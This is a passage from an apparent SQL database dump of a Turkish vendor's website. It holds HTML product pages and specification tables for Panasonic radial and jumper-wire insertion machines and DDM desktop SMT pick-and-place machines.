#333333;\">NM-EJR3A   -   NM-EJR4A</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Boyutları</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">L 50mm x W 50mm -  L 508mm x W 381mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Max. Hız</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,25 s / piece (14,000 CPH)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Komponent Sayısı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial;\"><span style=\"font-size: 12px;\">NM-ERJ3A =&gt; 40 / NM-ERJ4A =&gt; 80adet</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Uygulanabilir Komponentler</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Resistors, Electrolytic capacitors, Ceramic capacitors, LEDs, Transistors, Filters, Resistor networks, JIS C0805 (1989) ?Electronic Component Taping?, standard components</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Değiştirme Zamanı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Yaklaşık 2.0 s</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Yerleştirme Yönü</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\"><span style=\"font-size: 10pt;\">0</span><span style=\"font-size: 10pt;\">°, 90°, -90°, 180<span style=\"font-size: 10pt;\">°</span></span></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Güç Kaynağı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">3 faz AC 200 V 5 kVA</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Hava Kaynağı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,5 MPa, 80 L/min (A.N.R)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Boyutlar</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">W 3200 mm x D 2417mm x H 1575mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Ağırlık</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">2,250kg</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\"> </p>\r\n<p> </p>','RG131','','','','rg131'),(6,'Radyal Dizgi','<h2>Panasonic Yüksek Hızlı Radyal Bacaklı Malzeme Dizgi Makinesi</h2>\r\n<p style=\"text-align: left;\"> </p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/panasonic/pana_rh2sb.gif\" alt=\"\" border=\"0\" /> </td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<li><strong>0.14 saniye/malzeme hızıyla endüstrideki en iyi verimlilik</strong></li>\r\n<li><strong>2.5/5.0/7.5/10 mm bacak aralıklı radyal  malzemeleri dizebilme</strong></li>\r\n<li><strong>Sabit malzeme feederları ve malzeme bitiş uyarısı ile duraksamasız üretim</strong></li>\r\n<li><strong>Otomatik recovery özelliği ile %100 dizgi oranı</strong></li>\r\n<li><strong>Windows XP tabanlı LCD dokunmatik ekran</strong></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>  </p>\r\n<table id=\"zebra-blue\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; margin: auto 4.8pt; border: 1pt outset;\" border=\"1\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">MODEL ADI</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">RL132</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Model No</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">NM-EJR5A   -   NM-EJR6A</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Boyutları</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">L 50mm x W 50mm -  L 508mm x W 381mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Max. Hız</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,14 s / piece (21,000 CPH)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Komponent Sayısı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">NM-EJR5A =&gt; 40 / NM-EJR6A =&gt; 80 besleyici</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Uygulanabilir Komponentler</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Resistors, Electrolytic capacitors, Ceramic capacitors, LEDs, Transistors, Filters, Resistor networks, JIS C0805 (1989) ?Electronic Component Taping?, standard components</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Değiştirme Zamanı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Approx. 2.0 s</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Yerleştirme Yönü</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">1<span style=\"font-size: 10pt;\">° artışla 360<span style=\"font-size: 10pt;\">°</span></span></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Güç Kaynağı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">3 faz AC 200 V 5 kVA</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Hava Kaynağı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,5 MPa, 80 L/min (A.N.R)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Boyutlar</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">W 3200 mm x D 2417mm x H 1575mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Ağırlık</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">2300kg</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\"> </p>\r\n<p> </p>','RL132','','','','rl132'),(7,'Kısa-Devre Teli Dizgisi','<h5 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">Panasonic Y&uuml;ksek Hızlı Kısa Kısa Devre Teli Dizgi Makinası&nbsp;</h5>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/panasonic/pana_jvk3.gif\" alt=\"\" border=\"0\" />&nbsp;</td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<li><strong>0.08 saniye/malzeme hızıyla&nbsp;y&uuml;ksek dizgi hızı ve verimlilik</strong></li>\r\n<li><strong>5 mm - 31 mm arası 1/100&nbsp;aralıkla ayarlanabilen tel uzunluğu</strong></li>\r\n<li><strong>Bacak eğme uzunluğu değiştirilerek tel israfı minimuma&nbsp;indirilmiştir</strong></li>\r\n<li><strong>Otomatik koordinat d&uuml;zeltme&nbsp;fonksiyonu ile g&uuml;venilir dizgi&nbsp;</strong></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table id=zebra-blue border=\"1\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; margin: auto 4.8pt; width: 587px; height: 236px; border: 1pt outset;\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">MODEL ADI</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">JV131</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Model No</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">NM-EJA4A</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Boyutları</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">L 50mm x W 50mm -&nbsp;&nbsp;L 508mm x W 381mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Max. Hız</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,08 s / piece</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Komponent Ambalajı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Drum on floor (Reel applicable: Optional)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Uygulanabilir Komponentler</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Jumper wire (tin-plated)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Değiştirme Zamanı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">2.0 s</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Yerleştirme Y&ouml;n&uuml;</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">2 y&ouml;n (0, 90)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">G&uuml;&ccedil; Kaynağı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">3 faz</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Hava Kaynağı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,5 MPa, 15 L/min (A.N.R)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Boyutlar</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">W 2810 mm x D 1480mm x H 1415mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Ağırlık</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">1450kg</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>','JV131','','','','jv131'),(8,'Masa Üstü SMD Dizgi - 2,100cph','<h2>CS40 Otomatik Masa &Uuml;st&uuml; SMT Dizgi Makinesi</h2>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<ul style=\"background-image: text-align: left;\">\r\n<li style=\"text-align: left;\">D&uuml;ş&uuml;k hacimli ve prototip &uuml;retimler i&ccedil;in uygun maliyetli &ccedil;&ouml;z&uuml;m</li>\r\n<li style=\"text-align: left;\">Windows tabanlı yazılım ile kolay programlama</li>\r\n<li style=\"text-align: left;\">0603 chip malzemeden 25mil bacak aralıklı QFP\'ye kadar geniş aralıktaki malzemeleri dizebilme</li>\r\n<li style=\"text-align: left;\">96 adete kadar 8mm besleyici kapasitesi</li>\r\n<li style=\"text-align: left;\">Makara, t&uuml;p, d&ouml;kme, tepsi malzeme besleyiciler</li>\r\n<li style=\"text-align: left;\">Kafa &uuml;zerinde mekanik hizalama</li>\r\n<li style=\"text-align: left;\">Otomatik nozzle değiştirme</li>\r\n</ul>\r\n<p style=\"text-align: left;\"><img src=\"images/ddm/CS-40.gif\" alt=\"\" style=\"text-align: left;\" border=\"0\" />&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; border-collapse: collapse;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>MODEL ADI</td>\r\n<td>CS40</td>\r\n</tr>\r\n<tr>\r\n<td>Dizilebilen Malzeme Aralığı</td>\r\n<td>0603 chip - 35mm kare IC</td>\r\n</tr>\r\n<tr>\r\n<td>PCB Boyutları</td>\r\n<td>343mm x 560mm</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Hassasiyeti</td>\r\n<td>&plusmn;0.15 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Dizilebilen IC Bacak Aralığı</td>\r\n<td>0.635mm</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Dizgi Hızı</td>\r\n<td>2100 cph</td>\r\n</tr>\r\n<tr>\r\n<td>Pratik Dizgi Hızı</td>\r\n<td>1000-1800 cph</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Hareket Alanı</td>\r\n<td>560mm x 560mm</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Feeder Sayısı</td>\r\n<td>96 adet (8mm tape)</td>\r\n</tr>\r\n<tr>\r\n<td>Şerit Besleyiciler</td>\r\n<td>8, 12, 16, 24, 32, 44mm (Elektrikli)</td>\r\n</tr>\r\n<tr>\r\n<td>Titreşim Besleyiciler</td>\r\n<td>D&ouml;kme, t&uuml;p, &ccedil;ubuk (Frekans ve g&uuml;&ccedil;ayarlanabilir)</td>\r\n</tr>\r\n<tr>\r\n<td>Matrix Tray</td>\r\n<td>Tepsi sabitleyiciler</td>\r\n</tr>\r\n<tr>\r\n<td>Lazer Hizalama</td>\r\n<td>Yok</td>\r\n</tr>\r\n<tr>\r\n<td>Vision Sistemi</td>\r\n<td>Renkli PCB Kamera</td>\r\n</tr>\r\n<tr>\r\n<td>Dispenser Opsiyonu</td>\r\n<td>10.000 nokta/saat</td>\r\n</tr>\r\n<tr>\r\n<td>Boyutlar</td>\r\n<td>W 1016 mm x D 1067mm x H 635mm</td>\r\n</tr>\r\n</tbody>\r\n</table>','CS40','','','','cs40'),(9,'SMD P&P - 4,800cph','<h2>LS60V Kameralı Hizalama Sistemli&nbsp;Gelişmiş Masa &Uuml;st&uuml; SMT Dizgi Makinesi</h2>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\"><img src=\"images/ddm/LS60.jpg\" alt=\"\" style=\"text-align: left; font-family: Tahoma, Helvetica, Arial, sans-serif;\" border=\"0\" />&nbsp;</p>\r\n<ul style=\"background-image: font-family: Tahoma, Helvetica, Arial, sans-serif; text-align: left;\">\r\n<li>\r\n<p>330mmx813mm dizgi alanı ve 144 besleyici kapasitesi ve kameralı hizalama sisteminin avantajları&nbsp;ile en esnek SMT dizgi sistemidir</p>\r\n</li>\r\n<li>\r\n<p>Sınıfındaki en iyi grafik aray&uuml;z ile dakikalar i&ccedil;inde kolay programlama</p>\r\n</li>\r\n<li>\r\n<p>Cognex Vision sistemli kameralı malzeme hizalama ile hemen&nbsp;her tip&nbsp;malzemenin hassas dizgisi m&uuml;mk&uuml;nd&uuml;r</p>\r\n</li>\r\n<li>\r\n<p>&plusmn;0.025mm dizgi doğruluğu</p>\r\n</li>\r\n<li>\r\n<p>Maksimum 4800cph a ulaşan dizgi hızı</p>\r\n</li>\r\n<li>\r\n<p>0201 chip malzemeden 15mil bacak aralıklı QFP\'ye kadar geniş aralıktaki malzemeleri dizebilme</p>\r\n</li>\r\n<li>\r\n<p>2 mikron doğrusal hassas cetvelden gelen geri besleme ile kapalı &ccedil;evrim kontrol edilen&nbsp;dizgi kafası</p>\r\n</li>\r\n<li>\r\n<p>Makara, t&uuml;p, d&ouml;kme, tepsi malzeme besleyiciler</p>\r\n</li>\r\n<li>\r\n<p>Kafa &uuml;zerinde kamera, lazer veya mekanik hizalama</p>\r\n</li>\r\n<li>\r\n<p>Otomatik nozzle değiştirme&nbsp;</p>\r\n</li>\r\n<li>\r\n<p>Harici have bağlantısına ihtiya&ccedil; duymayan sistem</p>\r\n</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" style=\"cursor: default; border: 1px dashed #bbbbbb; width: 527px; border-collapse: collapse;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p>MODEL ADI</p>\r\n</td>\r\n<td>\r\n<p>LS60V</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>PCB Boyutları</p>\r\n</td>\r\n<td width=\"335\">\r\n<p>343mm x 813mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizilebilen Malzeme Aralığı</p>\r\n</td>\r\n<td>\r\n<p>0201 chip - 35mm kare IC</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizgi Hassasiyeti</p>\r\n</td>\r\n<td>\r\n<p>&plusmn;0.025 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p><span style=\"font-size: 16px; text-align: left;\">Dizilebilen IC Bacak Aralığı</span></p>\r\n</td>\r\n<td>\r\n<p>0.381mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Dizgi Hızı</p>\r\n</td>\r\n<td>\r\n<p>4800 cph</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Pratik Dizgi Hızı</p>\r\n</td>\r\n<td width=\"335\">\r\n<p>2500-3600 cph</p>\r\n</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt;\">\r\n<td width=\"192\" height=\"19\">\r\n<p>Maksimum Hareket Alanı</p>\r\n</td>\r\n<td width=\"335\">\r\n<p>560mm x 8130mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Feeder Sayısı</p>\r\n</td>\r\n<td width=\"335\">\r\n<p>144 adet (8mm tape)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt;\">\r\n<td width=\"192\" height=\"19\">\r\n<p>Şerit Besleyiciler</p>\r\n</td>\r\n<td>\r\n<p>8, 12, 16, 24, 32, 44mm (Elektrikli)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Titreşim Besleyiciler</p>\r\n</td>\r\n<td width=\"335\">\r\n<p>D&ouml;kme, t&uuml;p, 